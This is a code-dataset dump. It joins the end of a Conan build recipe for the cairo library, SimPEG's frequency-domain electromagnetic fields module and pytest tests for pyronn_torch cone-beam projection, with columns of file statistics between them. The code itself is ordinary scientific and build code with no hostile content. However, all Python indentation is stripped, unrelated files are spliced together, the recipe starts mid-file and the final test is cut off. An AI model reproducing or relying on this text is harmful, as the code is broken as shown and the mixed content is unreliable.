options = {"shared": [True, False]}
default_options = "shared=True"
generators = "cmake"
def configure(self):
self.options["pixman"].shared = "True"
self.options["freetype"].shared = "True"
def source(self):
self.run("wget https://www.cairographics.org/releases/cairo-%s.tar.xz -O cairo.tar.xz" % self.version)
self.run("tar -xvf cairo.tar.xz && mv cairo-%s cairo && cd cairo && ./configure" % self.version)
# Create CMakeLists.txt file
with open("CMakeLists.txt", "w") as f:
f.write(cmakelists_txt)
def build(self):
cmake = CMake(self.settings)
shared = "-DBUILD_SHARED_LIBS=ON" if self.options.shared else ""
self.run('cmake . %s %s' % (cmake.command_line, shared))
self.run("cmake --build . %s" % cmake.build_config)
def package(self):
self.copy("cairo.h", dst="include/cairo", src="cairo/src")
self.copy("cairo-deprecated.h", dst="include/cairo", src="cairo/src")
self.copy("cairo-features.h", dst="include/cairo", src="cairo/src")
self.copy("cairo-ft.h", dst="include/cairo", src="cairo/src")
self.copy("cairo-pdf.h", dst="include/cairo", src="cairo/src")
self.copy("cairo-ps.h", dst="include/cairo", src="cairo/src")
self.copy("cairo-script.h", dst="include/cairo", src="cairo/src")
self.copy("cairo-svg.h", dst="include/cairo", src="cairo/src")
self.copy("cairo-version.h", dst="include/cairo", src="cairo/src")
self.copy("cairo-xcb.h", dst="include/cairo", src="cairo/src")
self.copy("cairo-xlib.h", dst="include/cairo", src="cairo/src")
self.copy("cairo-xlib-xrender.h", dst="include/cairo", src="cairo/src")
self.copy("*cairo.lib", dst="lib", keep_path=False)
self.copy("*.dll", dst="bin", keep_path=False)
self.copy("*.so", dst="lib", keep_path=False)
self.copy("*.a", dst="lib", keep_path=False)
def package_info(self):
self.cpp_info.libs = ["cairo"]
| 51.512605
| 110
| 0.764274
| 1,914
| 12,260
| 4.638454
| 0.147858
| 0.151385
| 0.224037
| 0.335886
| 0.748254
| 0.734062
| 0.734062
| 0.72415
| 0.582226
| 0.270106
| 0
| 0.002851
| 0.084421
| 12,260
| 237
| 111
| 51.729958
| 0.788062
| 0.002121
| 0
| 0.018018
| 0
| 0.004505
| 0.871403
| 0.714274
| 0
| 0
| 0
| 0
| 0
| 1
| 0.022523
| false
| 0
| 0.009009
| 0
| 0.09009
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e171a5c5c8613d2389889230e3d49759bb78b616
| 30,456
|
py
|
Python
|
SimPEG/EM/FDEM/FieldsFDEM.py
|
KyuboNoh/HY
|
8ba9815137c2cff2f1931a1940e1b762e8df0b02
|
[
"MIT"
] | 1
|
2020-11-27T03:26:22.000Z
|
2020-11-27T03:26:22.000Z
|
SimPEG/EM/FDEM/FieldsFDEM.py
|
KyuboNoh/HY
|
8ba9815137c2cff2f1931a1940e1b762e8df0b02
|
[
"MIT"
] | null | null | null |
SimPEG/EM/FDEM/FieldsFDEM.py
|
KyuboNoh/HY
|
8ba9815137c2cff2f1931a1940e1b762e8df0b02
|
[
"MIT"
] | null | null | null |
import numpy as np
import scipy.sparse as sp
import SimPEG
from SimPEG import Utils
from SimPEG.EM.Utils import omega
from SimPEG.Utils import Zero, Identity
class Fields(SimPEG.Problem.Fields):
"""
Fancy Field Storage for a FDEM survey. Only one field type is stored for
each problem, the rest are computed. The fields obejct acts like an array and is indexed by
.. code-block:: python
f = problem.fields(m)
e = f[srcList,'e']
b = f[srcList,'b']
If accessing all sources for a given field, use the :code:`:`
.. code-block:: python
f = problem.fields(m)
e = f[:,'e']
b = f[:,'b']
The array returned will be size (nE or nF, nSrcs :math:`\\times` nFrequencies)
"""
knownFields = {}
dtype = complex
class Fields_e(Fields):
"""
Fields object for Problem_e.
:param Mesh mesh: mesh
:param Survey survey: survey
"""
knownFields = {'eSolution':'E'}
aliasFields = {
'e' : ['eSolution','E','_e'],
'ePrimary' : ['eSolution','E','_ePrimary'],
'eSecondary' : ['eSolution','E','_eSecondary'],
'b' : ['eSolution','F','_b'],
'bPrimary' : ['eSolution','F','_bPrimary'],
'bSecondary' : ['eSolution','F','_bSecondary']
}
def __init__(self,mesh,survey,**kwargs):
Fields.__init__(self,mesh,survey,**kwargs)
def startup(self):
self.prob = self.survey.prob
self._edgeCurl = self.survey.prob.mesh.edgeCurl
def _ePrimary(self, eSolution, srcList):
"""
Primary electric field from source
:param numpy.ndarray eSolution: field we solved for
:param list srcList: list of sources
:rtype: numpy.ndarray
:return: primary electric field as defined by the sources
"""
ePrimary = np.zeros_like(eSolution)
for i, src in enumerate(srcList):
ep = src.ePrimary(self.prob)
ePrimary[:,i] = ePrimary[:,i] + ep
return ePrimary
def _eSecondary(self, eSolution, srcList):
"""
Secondary electric field is the thing we solved for
:param numpy.ndarray eSolution: field we solved for
:param list srcList: list of sources
:rtype: numpy.ndarray
:return: secondary electric field
"""
return eSolution
def _e(self, eSolution, srcList):
"""
Total electric field is sum of primary and secondary
:param numpy.ndarray eSolution: field we solved for
:param list srcList: list of sources
:rtype: numpy.ndarray
:return: total electric field
"""
return self._ePrimary(eSolution,srcList) + self._eSecondary(eSolution,srcList)
def _eDeriv_u(self, src, v, adjoint = False):
"""
Derivative of the total electric field with respect to the thing we
solved for
:param SimPEG.EM.FDEM.Src src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the electric field with respect to the field we solved for with a vector
"""
return Identity()*v
def _eDeriv_m(self, src, v, adjoint = False):
"""
Derivative of the total electric field with respect to the inversion model. Here, we assume that the primary does not depend on the model.
:param SimPEG.EM.FDEM.Src src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: SimPEG.Utils.Zero
:return: product of the electric field derivative with respect to the inversion model with a vector
"""
# assuming primary does not depend on the model
return Zero()
def _bPrimary(self, eSolution, srcList):
"""
Primary magnetic flux density from source
:param numpy.ndarray eSolution: field we solved for
:param list srcList: list of sources
:rtype: numpy.ndarray
:return: primary magnetic flux density as defined by the sources
"""
bPrimary = np.zeros([self._edgeCurl.shape[0],eSolution.shape[1]],dtype = complex)
for i, src in enumerate(srcList):
bp = src.bPrimary(self.prob)
bPrimary[:,i] = bPrimary[:,i] + bp
return bPrimary
def _bSecondary(self, eSolution, srcList):
"""
Secondary magnetic flux density from eSolution
:param numpy.ndarray eSolution: field we solved for
:param list srcList: list of sources
:rtype: numpy.ndarray
:return: secondary magnetic flux density
"""
C = self._edgeCurl
b = (C * eSolution)
for i, src in enumerate(srcList):
b[:,i] *= - 1./(1j*omega(src.freq))
S_m, _ = src.eval(self.prob)
b[:,i] = b[:,i]+ 1./(1j*omega(src.freq)) * S_m
return b
def _bSecondaryDeriv_u(self, src, v, adjoint = False):
"""
Derivative of the secondary magnetic flux density with respect to the thing we solved for
:param SimPEG.EM.FDEM.Src src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the secondary magnetic flux density with respect to the field we solved for with a vector
"""
C = self._edgeCurl
if adjoint:
return - 1./(1j*omega(src.freq)) * (C.T * v)
return - 1./(1j*omega(src.freq)) * (C * v)
def _bSecondaryDeriv_m(self, src, v, adjoint = False):
"""
Derivative of the secondary magnetic flux density with respect to the inversion model.
:param SimPEG.EM.FDEM.Src src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the secondary magnetic flux density derivative with respect to the inversion model with a vector
"""
S_mDeriv, _ = src.evalDeriv(self.prob, v, adjoint)
return 1./(1j * omega(src.freq)) * S_mDeriv
def _b(self, eSolution, srcList):
"""
Total magnetic flux density is sum of primary and secondary
:param numpy.ndarray eSolution: field we solved for
:param list srcList: list of sources
:rtype: numpy.ndarray
:return: total magnetic flux density
"""
return self._bPrimary(eSolution, srcList) + self._bSecondary(eSolution, srcList)
def _bDeriv_u(self, src, v, adjoint=False):
"""
Derivative of the total magnetic flux density with respect to the thing we solved for
:param SimPEG.EM.FDEM.Src src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the magnetic flux density with respect to the field we solved for with a vector
"""
# Primary does not depend on u
return self._bSecondaryDeriv_u(src, v, adjoint)
def _bDeriv_m(self, src, v, adjoint=False):
"""
Derivative of the total magnetic flux density with respect to the inversion model.
:param SimPEG.EM.FDEM.Src src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: SimPEG.Utils.Zero
:return: product of the magnetic flux density derivative with respect to the inversion model with a vector
"""
# Assuming the primary does not depend on the model
return self._bSecondaryDeriv_m(src, v, adjoint)
class Fields_b(Fields):
"""
Fields object for Problem_b.
:param Mesh mesh: mesh
:param Survey survey: survey
"""
knownFields = {'bSolution':'F'}
aliasFields = {
'b' : ['bSolution','F','_b'],
'bPrimary' : ['bSolution','F','_bPrimary'],
'bSecondary' : ['bSolution','F','_bSecondary'],
'e' : ['bSolution','E','_e'],
'ePrimary' : ['bSolution','E','_ePrimary'],
'eSecondary' : ['bSolution','E','_eSecondary'],
}
def __init__(self,mesh,survey,**kwargs):
Fields.__init__(self,mesh,survey,**kwargs)
def startup(self):
self.prob = self.survey.prob
self._edgeCurl = self.survey.prob.mesh.edgeCurl
self._MeSigmaI = self.survey.prob.MeSigmaI
self._MfMui = self.survey.prob.MfMui
self._MeSigmaIDeriv = self.survey.prob.MeSigmaIDeriv
self._Me = self.survey.prob.Me
def _bPrimary(self, bSolution, srcList):
"""
Primary magnetic flux density from source
:param numpy.ndarray bSolution: field we solved for
:param list srcList: list of sources
:rtype: numpy.ndarray
:return: primary electric field as defined by the sources
"""
bPrimary = np.zeros_like(bSolution)
for i, src in enumerate(srcList):
bp = src.bPrimary(self.prob)
bPrimary[:,i] = bPrimary[:,i] + bp
return bPrimary
def _bSecondary(self, bSolution, srcList):
"""
Secondary magnetic flux density is the thing we solved for
:param numpy.ndarray bSolution: field we solved for
:param list srcList: list of sources
:rtype: numpy.ndarray
:return: secondary magnetic flux density
"""
return bSolution
def _b(self, bSolution, srcList):
"""
Total magnetic flux density is sum of primary and secondary
:param numpy.ndarray bSolution: field we solved for
:param list srcList: list of sources
:rtype: numpy.ndarray
:return: total magnetic flux density
"""
return self._bPrimary(bSolution, srcList) + self._bSecondary(bSolution, srcList)
def _bDeriv_u(self, src, v, adjoint=False):
"""
Derivative of the total magnetic flux density with respect to the thing we
solved for
:param SimPEG.EM.FDEM.Src src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the magnetic flux density with respect to the field we solved for with a vector
"""
return Identity()*v
def _bDeriv_m(self, src, v, adjoint=False):
"""
Derivative of the total magnetic flux density with respect to the inversion model. Here, we assume that the primary does not depend on the model.
:param SimPEG.EM.FDEM.Src src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: SimPEG.Utils.Zero
:return: product of the magnetic flux density derivative with respect to the inversion model with a vector
"""
# assuming primary does not depend on the model
return Zero()
def _ePrimary(self, bSolution, srcList):
"""
Primary electric field from source
:param numpy.ndarray bSolution: field we solved for
:param list srcList: list of sources
:rtype: numpy.ndarray
:return: primary electric field as defined by the sources
"""
ePrimary = np.zeros([self._edgeCurl.shape[1],bSolution.shape[1]],dtype = complex)
for i,src in enumerate(srcList):
ep = src.ePrimary(self.prob)
ePrimary[:,i] = ePrimary[:,i] + ep
return ePrimary
def _eSecondary(self, bSolution, srcList):
"""
Secondary electric field from bSolution
:param numpy.ndarray bSolution: field we solved for
:param list srcList: list of sources
:rtype: numpy.ndarray
:return: secondary electric field
"""
e = self._MeSigmaI * ( self._edgeCurl.T * ( self._MfMui * bSolution))
for i,src in enumerate(srcList):
_,S_e = src.eval(self.prob)
e[:,i] = e[:,i]+ -self._MeSigmaI * S_e
return e
def _eSecondaryDeriv_u(self, src, v, adjoint=False):
"""
Derivative of the secondary electric field with respect to the thing we solved for
:param SimPEG.EM.FDEM.Src src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the secondary electric field with respect to the field we solved for with a vector
"""
if not adjoint:
return self._MeSigmaI * ( self._edgeCurl.T * ( self._MfMui * v) )
else:
return self._MfMui.T * (self._edgeCurl * (self._MeSigmaI.T * v))
def _eSecondaryDeriv_m(self, src, v, adjoint=False):
"""
Derivative of the secondary electric field with respect to the inversion model
:param SimPEG.EM.FDEM.Src src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the secondary electric field with respect to the model with a vector
"""
bSolution = self[[src],'bSolution']
_,S_e = src.eval(self.prob)
Me = self._Me
if adjoint:
Me = Me.T
w = self._edgeCurl.T * (self._MfMui * bSolution)
w = w - Utils.mkvc(Me * S_e,2)
if not adjoint:
de_dm = self._MeSigmaIDeriv(w) * v
elif adjoint:
de_dm = self._MeSigmaIDeriv(w).T * v
_, S_eDeriv = src.evalDeriv(self.prob, v, adjoint)
de_dm = de_dm - self._MeSigmaI * S_eDeriv
return de_dm
def _e(self, bSolution, srcList):
"""
Total electric field is sum of primary and secondary
:param numpy.ndarray eSolution: field we solved for
:param list srcList: list of sources
:rtype: numpy.ndarray
:return: total electric field
"""
return self._ePrimary(bSolution, srcList) + self._eSecondary(bSolution, srcList)
def _eDeriv_u(self, src, v, adjoint=False):
"""
Derivative of the total electric field with respect to the thing we solved for
:param SimPEG.EM.FDEM.Src src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the electric field with respect to the field we solved for with a vector
"""
return self._eSecondaryDeriv_u(src, v, adjoint)
def _eDeriv_m(self, src, v, adjoint=False):
"""
Derivative of the total electric field density with respect to the inversion model.
:param SimPEG.EM.FDEM.Src src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the electric field derivative with respect to the inversion model with a vector
"""
# assuming primary doesn't depend on model
return self._eSecondaryDeriv_m(src, v, adjoint)
class Fields_j(Fields):
"""
Fields object for Problem_j.
:param Mesh mesh: mesh
:param Survey survey: survey
"""
knownFields = {'jSolution':'F'}
aliasFields = {
'j' : ['jSolution','F','_j'],
'jPrimary' : ['jSolution','F','_jPrimary'],
'jSecondary' : ['jSolution','F','_jSecondary'],
'h' : ['jSolution','E','_h'],
'hPrimary' : ['jSolution','E','_hPrimary'],
'hSecondary' : ['jSolution','E','_hSecondary'],
}
def __init__(self,mesh,survey,**kwargs):
Fields.__init__(self,mesh,survey,**kwargs)
def startup(self):
self.prob = self.survey.prob
self._edgeCurl = self.survey.prob.mesh.edgeCurl
self._MeMuI = self.survey.prob.MeMuI
self._MfRho = self.survey.prob.MfRho
self._MfRhoDeriv = self.survey.prob.MfRhoDeriv
self._Me = self.survey.prob.Me
def _jPrimary(self, jSolution, srcList):
"""
Primary current density from source
:param numpy.ndarray jSolution: field we solved for
:param list srcList: list of sources
:rtype: numpy.ndarray
:return: primary current density as defined by the sources
"""
jPrimary = np.zeros_like(jSolution,dtype = complex)
for i, src in enumerate(srcList):
jp = src.jPrimary(self.prob)
jPrimary[:,i] = jPrimary[:,i] + jp
return jPrimary
def _jSecondary(self, jSolution, srcList):
"""
Secondary current density is the thing we solved for
:param numpy.ndarray jSolution: field we solved for
:param list srcList: list of sources
:rtype: numpy.ndarray
:return: secondary current density
"""
return jSolution
def _j(self, jSolution, srcList):
"""
Total current density is sum of primary and secondary
:param numpy.ndarray jSolution: field we solved for
:param list srcList: list of sources
:rtype: numpy.ndarray
:return: total current density
"""
return self._jPrimary(jSolution, srcList) + self._jSecondary(jSolution, srcList)
def _jDeriv_u(self, src, v, adjoint=False):
"""
Derivative of the total current density with respect to the thing we
solved for
:param SimPEG.EM.FDEM.Src src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the current density with respect to the field we solved for with a vector
"""
return Identity()*v
def _jDeriv_m(self, src, v, adjoint=False):
"""
Derivative of the total current density with respect to the inversion model. Here, we assume that the primary does not depend on the model.
:param SimPEG.EM.FDEM.Src src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: SimPEG.Utils.Zero
:return: product of the current density derivative with respect to the inversion model with a vector
"""
# assuming primary does not depend on the model
return Zero()
def _hPrimary(self, jSolution, srcList):
"""
Primary magnetic field from source
:param numpy.ndarray hSolution: field we solved for
:param list srcList: list of sources
:rtype: numpy.ndarray
:return: primary magnetic field as defined by the sources
"""
hPrimary = np.zeros([self._edgeCurl.shape[1],jSolution.shape[1]],dtype = complex)
for i, src in enumerate(srcList):
hp = src.hPrimary(self.prob)
hPrimary[:,i] = hPrimary[:,i] + hp
return hPrimary
def _hSecondary(self, jSolution, srcList):
"""
Secondary magnetic field from bSolution
:param numpy.ndarray jSolution: field we solved for
:param list srcList: list of sources
:rtype: numpy.ndarray
:return: secondary magnetic field
"""
h = self._MeMuI * (self._edgeCurl.T * (self._MfRho * jSolution) )
for i, src in enumerate(srcList):
h[:,i] *= -1./(1j*omega(src.freq))
S_m,_ = src.eval(self.prob)
h[:,i] = h[:,i]+ 1./(1j*omega(src.freq)) * self._MeMuI * (S_m)
return h
def _hSecondaryDeriv_u(self, src, v, adjoint=False):
"""
Derivative of the secondary magnetic field with respect to the thing we solved for
:param SimPEG.EM.FDEM.Src src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the secondary magnetic field with respect to the field we solved for with a vector
"""
if not adjoint:
return -1./(1j*omega(src.freq)) * self._MeMuI * (self._edgeCurl.T * (self._MfRho * v) )
elif adjoint:
return -1./(1j*omega(src.freq)) * self._MfRho.T * (self._edgeCurl * ( self._MeMuI.T * v))
def _hSecondaryDeriv_m(self, src, v, adjoint=False):
"""
Derivative of the secondary magnetic field with respect to the inversion model
:param SimPEG.EM.FDEM.Src src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the secondary magnetic field with respect to the model with a vector
"""
jSolution = self[[src],'jSolution']
MeMuI = self._MeMuI
C = self._edgeCurl
MfRho = self._MfRho
MfRhoDeriv = self._MfRhoDeriv
Me = self._Me
if not adjoint:
hDeriv_m = -1./(1j*omega(src.freq)) * MeMuI * (C.T * (MfRhoDeriv(jSolution)*v ) )
elif adjoint:
hDeriv_m = -1./(1j*omega(src.freq)) * MfRhoDeriv(jSolution).T * ( C * (MeMuI.T * v ) )
S_mDeriv,_ = src.evalDeriv(self.prob, adjoint = adjoint)
if not adjoint:
S_mDeriv = S_mDeriv(v)
hDeriv_m = hDeriv_m + 1./(1j*omega(src.freq)) * MeMuI * (Me * S_mDeriv)
elif adjoint:
S_mDeriv = S_mDeriv(Me.T * (MeMuI.T * v))
hDeriv_m = hDeriv_m + 1./(1j*omega(src.freq)) * S_mDeriv
return hDeriv_m
def _h(self, jSolution, srcList):
"""
Total magnetic field is sum of primary and secondary
:param numpy.ndarray eSolution: field we solved for
:param list srcList: list of sources
:rtype: numpy.ndarray
:return: total magnetic field
"""
return self._hPrimary(jSolution, srcList) + self._hSecondary(jSolution, srcList)
def _hDeriv_u(self, src, v, adjoint=False):
"""
Derivative of the total magnetic field with respect to the thing we solved for
:param SimPEG.EM.FDEM.Src src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the magnetic field with respect to the field we solved for with a vector
"""
return self._hSecondaryDeriv_u(src, v, adjoint)
def _hDeriv_m(self, src, v, adjoint=False):
"""
Derivative of the total magnetic field density with respect to the inversion model.
:param SimPEG.EM.FDEM.Src src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the magnetic field derivative with respect to the inversion model with a vector
"""
# assuming the primary doesn't depend on the model
return self._hSecondaryDeriv_m(src, v, adjoint)
class Fields_h(Fields):
"""
Fields object for Problem_h.
:param Mesh mesh: mesh
:param Survey survey: survey
"""
knownFields = {'hSolution':'E'}
aliasFields = {
'h' : ['hSolution','E','_h'],
'hPrimary' : ['hSolution','E','_hPrimary'],
'hSecondary' : ['hSolution','E','_hSecondary'],
'j' : ['hSolution','F','_j'],
'jPrimary' : ['hSolution','F','_jPrimary'],
'jSecondary' : ['hSolution','F','_jSecondary']
}
def __init__(self,mesh,survey,**kwargs):
Fields.__init__(self,mesh,survey,**kwargs)
def startup(self):
self.prob = self.survey.prob
self._edgeCurl = self.survey.prob.mesh.edgeCurl
self._MeMuI = self.survey.prob.MeMuI
self._MfRho = self.survey.prob.MfRho
def _hPrimary(self, hSolution, srcList):
"""
Primary magnetic field from source
:param numpy.ndarray eSolution: field we solved for
:param list srcList: list of sources
:rtype: numpy.ndarray
:return: primary magnetic field as defined by the sources
"""
hPrimary = np.zeros_like(hSolution,dtype = complex)
for i, src in enumerate(srcList):
hp = src.hPrimary(self.prob)
hPrimary[:,i] = hPrimary[:,i] + hp
return hPrimary
def _hSecondary(self, hSolution, srcList):
"""
Secondary magnetic field is the thing we solved for
:param numpy.ndarray hSolution: field we solved for
:param list srcList: list of sources
:rtype: numpy.ndarray
:return: secondary magnetic field
"""
return hSolution
def _h(self, hSolution, srcList):
"""
Total magnetic field is sum of primary and secondary
:param numpy.ndarray hSolution: field we solved for
:param list srcList: list of sources
:rtype: numpy.ndarray
:return: total magnetic field
"""
return self._hPrimary(hSolution, srcList) + self._hSecondary(hSolution, srcList)
def _hDeriv_u(self, src, v, adjoint=False):
"""
Derivative of the total magnetic field with respect to the thing we
solved for
:param SimPEG.EM.FDEM.Src src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the magnetic field with respect to the field we solved for with a vector
"""
return Identity()*v
def _hDeriv_m(self, src, v, adjoint=False):
"""
Derivative of the total magnetic field with respect to the inversion model. Here, we assume that the primary does not depend on the model.
:param SimPEG.EM.FDEM.Src src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: SimPEG.Utils.Zero
:return: product of the magnetic field derivative with respect to the inversion model with a vector
"""
# assuming primary does not depend on the model
return Zero()
def _jPrimary(self, hSolution, srcList):
"""
Primary current density from source
:param numpy.ndarray hSolution: field we solved for
:param list srcList: list of sources
:rtype: numpy.ndarray
:return: primary current density as defined by the sources
"""
jPrimary = np.zeros([self._edgeCurl.shape[0], hSolution.shape[1]], dtype = complex)
for i, src in enumerate(srcList):
jp = src.jPrimary(self.prob)
jPrimary[:,i] = jPrimary[:,i] + jp
return jPrimary
def _jSecondary(self, hSolution, srcList):
"""
Secondary current density from eSolution
:param numpy.ndarray hSolution: field we solved for
:param list srcList: list of sources
:rtype: numpy.ndarray
:return: secondary current density
"""
j = self._edgeCurl*hSolution
for i, src in enumerate(srcList):
_,S_e = src.eval(self.prob)
j[:,i] = j[:,i]+ -S_e
return j
def _jSecondaryDeriv_u(self, src, v, adjoint=False):
"""
Derivative of the secondary current density with respect to the thing we solved for
:param SimPEG.EM.FDEM.Src src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the secondary current density with respect to the field we solved for with a vector
"""
if not adjoint:
return self._edgeCurl*v
elif adjoint:
return self._edgeCurl.T*v
def _jSecondaryDeriv_m(self, src, v, adjoint=False):
"""
Derivative of the secondary current density with respect to the inversion model.
:param SimPEG.EM.FDEM.Src src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the secondary current density derivative with respect to the inversion model with a vector
"""
_,S_eDeriv = src.evalDeriv(self.prob, v, adjoint)
return -S_eDeriv
def _j(self, hSolution, srcList):
"""
Total current density is sum of primary and secondary
:param numpy.ndarray eSolution: field we solved for
:param list srcList: list of sources
:rtype: numpy.ndarray
:return: total current density
"""
return self._jPrimary(hSolution, srcList) + self._jSecondary(hSolution, srcList)
def _jDeriv_u(self, src, v, adjoint=False):
"""
Derivative of the total current density with respect to the thing we solved for
:param SimPEG.EM.FDEM.Src src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the current density with respect to the field we solved for with a vector
"""
return self._jSecondaryDeriv_u(src,v,adjoint)
def _jDeriv_m(self, src, v, adjoint=False):
"""
Derivative of the total current density with respect to the inversion model.
:param SimPEG.EM.FDEM.Src src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: SimPEG.Utils.Zero
:return: product of the current density with respect to the inversion model with a vector
"""
# assuming the primary does not depend on the model
return self._jSecondaryDeriv_m(src,v,adjoint)
| 35.331787
| 154
| 0.607171
| 3,749
| 30,456
| 4.860496
| 0.047746
| 0.059269
| 0.031391
| 0.042147
| 0.831303
| 0.814839
| 0.792119
| 0.771266
| 0.758149
| 0.731588
| 0
| 0.001647
| 0.302305
| 30,456
| 861
| 155
| 35.372822
| 0.855899
| 0.472419
| 0
| 0.425926
| 0
| 0
| 0.048975
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.207407
| false
| 0
| 0.022222
| 0
| 0.477778
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e18fb08f71eef65c110a75e64c5ead9db3e77a70
| 5,660
|
py
|
Python
|
tests/test_projection.py
|
resonance20/pyronn-torch
|
1707f955f9aecd3c3f8767e7d4516bd3b0298cfe
|
[
"MIT"
] | null | null | null |
tests/test_projection.py
|
resonance20/pyronn-torch
|
1707f955f9aecd3c3f8767e7d4516bd3b0298cfe
|
[
"MIT"
] | null | null | null |
tests/test_projection.py
|
resonance20/pyronn-torch
|
1707f955f9aecd3c3f8767e7d4516bd3b0298cfe
|
[
"MIT"
] | null | null | null |
#
# Copyright © 2020 Stephan Seitz <stephan.seitz@fau.de>
#
# Distributed under terms of the GPLv3 license.
"""
"""
import numpy as np
import pytest
import pyronn_torch
def test_init():
assert pyronn_torch.cpp_extension
@pytest.mark.parametrize('with_texture', ('with_texture', False))
@pytest.mark.parametrize('with_backward', ('with_backward', False))
def test_projection(with_texture, with_backward):
projector = pyronn_torch.ConeBeamProjector(
(128, 128, 128), (2.0, 2.0, 2.0), (-127.5, -127.5, -127.5),
(2, 480, 620), [1.0, 1.0], (0, 0),
np.array(
[[[-3.10e+2, -1.20e+03, 0.00e+00, 1.86e+5],
[-2.40e+2, 0.00e+00, 1.20e+03, 1.44e+5],
[-1.00e+00, 0.00e+00, 0.00e+00, 6.00e+2]],
[[-2.89009888e+2, -1.20522754e+3, -1.02473585e-13, 1.86000000e+5],
[-2.39963440e+2, -4.18857765e+0, 1.20000000e+3, 1.44000000e+5],
[-9.99847710e-01, -1.74524058e-2, 0.00000000e+0,
6.00000000e+2]]]))
volume = projector.new_volume_tensor(
requires_grad=True if with_backward else False)
volume += 1.
result = projector.project_forward(volume, use_texture=with_texture)
assert result is not None
if with_backward:
assert volume.requires_grad
assert result.requires_grad
loss = result.mean()
loss.backward()
@pytest.mark.parametrize('with_texture', ('with_texture', False))
@pytest.mark.parametrize('with_backward', ('with_backward', False))
def test_projection_backward(with_texture, with_backward):
projector = pyronn_torch.ConeBeamProjector(
(128, 128, 128), (2.0, 2.0, 2.0), (-127.5, -127.5, -127.5),
(2, 480, 620), [1.0, 1.0], (0, 0),
np.array(
[[[-3.10e+2, -1.20e+03, 0.00e+00, 1.86e+5],
[-2.40e+2, 0.00e+00, 1.20e+03, 1.44e+5],
[-1.00e+00, 0.00e+00, 0.00e+00, 6.00e+2]],
[[-2.89009888e+2, -1.20522754e+3, -1.02473585e-13, 1.86000000e+5],
[-2.39963440e+2, -4.18857765e+0, 1.20000000e+3, 1.44000000e+5],
[-9.99847710e-01, -1.74524058e-2, 0.00000000e+0,
6.00000000e+2]]]))
projection = projector.new_projection_tensor(
requires_grad=True if with_backward else False)
projection += 1.
result = projector.project_backward(projection, use_texture=with_texture)
assert result.shape == projector._volume_shape
assert result is not None
if with_backward:
assert projection.requires_grad
assert result.requires_grad
loss = result.mean()
loss.backward()
@pytest.mark.parametrize('with_backward', ('with_backward', False))
def test_conrad_config(with_backward, with_texture=True):
import pytest
pytest.importorskip("pyconrad")
projector = pyronn_torch.ConeBeamProjector.from_conrad_config()
volume = projector.new_volume_tensor(
requires_grad=True if with_backward else False)
volume += 1.
result = projector.project_forward(volume, use_texture=with_texture)
import pyconrad.autoinit
pyconrad.imshow(result)
assert result is not None
if with_backward:
assert volume.requires_grad
assert result.requires_grad
loss = result.mean()
loss.backward()
def test_projection_backward_conrad(with_texture=True, with_backward=True):
import pytest
pytest.importorskip("pyconrad")
projector = pyronn_torch.ConeBeamProjector.from_conrad_config()
projection = projector.new_projection_tensor(
requires_grad=True if with_backward else False)
projection += 1000.
result = projector.project_backward(projection, use_texture=with_texture)
import pyconrad.autoinit
pyconrad.imshow(result)
assert result.shape == projector._volume_shape
assert result is not None
if with_backward:
assert projection.requires_grad
assert result.requires_grad
loss = result.mean()
loss.backward()
def test_conrad_forward_backward():
import pytest
pytest.importorskip("pyconrad")
projector = pyronn_torch.ConeBeamProjector.from_conrad_config()
